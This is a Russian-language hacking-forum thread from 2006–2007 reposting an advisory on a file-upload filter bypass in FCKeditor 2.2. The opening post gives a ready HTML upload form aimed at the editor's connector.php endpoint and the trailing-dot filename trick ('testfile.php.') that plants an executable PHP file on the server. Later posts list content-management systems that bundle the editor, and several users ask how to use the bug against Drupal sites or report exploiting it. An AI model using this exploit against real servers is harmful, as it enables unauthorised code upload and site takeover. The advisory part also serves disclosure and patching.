Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Уязвимость в FCKeditor 2.2 (https://forum.antichat.xyz/showthread.php?t=15117)

censored! 27.02.2006 13:50

Уязвимость в FCKeditor 2.2
 
Что-то новость прошла незамеченной...

Исследование: NSA Group
Продукт: FCKeditor 2.2
Сайт производителя: http://www.fckeditor.net

Описание:
Возможен обход фильтрации расширений файлов.

Воздействие:
Загрузка запрещённых файлов на целевую систему.

Риск: высокий

Пример:
Код:

<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload:
<input id="txtFileUpload" type="file" name="NewFile">
<input type="submit" value="Upload">
</form>

В конце имени загружаемого файла поставеть символ "." (пример: testfile.php.)

В результате на сервере будет создан файл testfile.php

Решение:
Обратиться на сайт производителя http://www.fckeditor.net
---
Источник: http://www.nsag.ru/vuln/893.html

censored! 27.02.2006 13:54

p.s. FCKeditor используется во многих CMS:
Drupal
в mamboo-joomla (connector.php там по-моему переименован в php_http_connector.php)
php-nuke
koobi (но там он или переименован либо вырезан (надо смотреть))

podkashey 27.02.2006 21:44

Цитата:

Что-то новость прошла незамеченной...
Может уязвимость не особо опасная... Так бы пол рунета накрылось... Хотя я в Cms и тд вообще профан. Знаю только зачем они нужны, как работают и даже общался с одной. ;)

Muhacir 24.11.2006 12:40

Цитата:

Сообщение от censored!
p.s. FCKeditor используется во многих CMS:
Drupal
в mamboo-joomla (connector.php там по-моему переименован в php_http_connector.php)
php-nuke
koobi (но там он или переименован либо вырезан (надо смотреть))

Kak W Drupal Zalit Kankretno? Mojesh Obyasnit? :rolleyes:

Mr_Necromancer 09.02.2007 09:57

Кто-нибудь юзал этот баг? У меня почему-то не получилось его поюзать.

guest3297 09.02.2007 10:23

стукни в асю.

MagNomeTik 10.02.2007 01:10

не... баг реально работает... странно что его не заметили..хотя...

guest3297 10.02.2007 01:28

Каму надо тот заметил :)

SQLHACK 10.02.2007 01:51

точно , точно заметили, и работает всё

Ксю 26.04.2007 06:05

Опишите поподробнее уязвимость. В какую папку будет залит файл? У меня нифига не получилось :(


Время: 13:29